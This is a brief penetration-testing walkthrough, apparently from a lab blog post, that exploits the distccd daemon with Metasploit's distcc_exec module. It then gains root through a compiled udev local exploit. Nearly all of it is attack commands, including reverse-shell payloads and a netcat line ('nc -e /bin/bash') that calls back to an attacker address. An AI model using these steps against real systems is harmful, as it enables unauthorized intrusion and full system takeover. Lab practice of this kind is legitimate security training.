Attack Linux DistCC Daemon – This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
Search Exploit
msf5 exploit(unix/misc/distcc_exec) > search distcc
msf5 exploit(unix/misc/distcc_exec) > info
Find respective Payload
msf5 exploit(unix/misc/distcc_exec) > show payloads
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse_perl
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 172.16.74.129
msf5 exploit(unix/misc/distcc_exec) > set LHOST 172.16.74.128
msf5 exploit(unix/misc/distcc_exec) > show options
msf5 exploit(unix/misc/distcc_exec) > exploit
hostname
ip a
whoami
We Don’t have Root, now what?
Privileged Escalation
gcc /usr/share/exploitdb/exploits/linux/local/8572.c -o /root/PriveEscal
upload /root/PriveEscal /tmp/PriveEscal
echo '#!/bin/bash' > /tmp/run
echo '/bin/nc -e /bin/bash 172.16.74.128 4445' >> /tmp/run
ps -eaf | grep udev | grep -v grep
subtract 1 to your PID
./PriveEscal 2743
Comments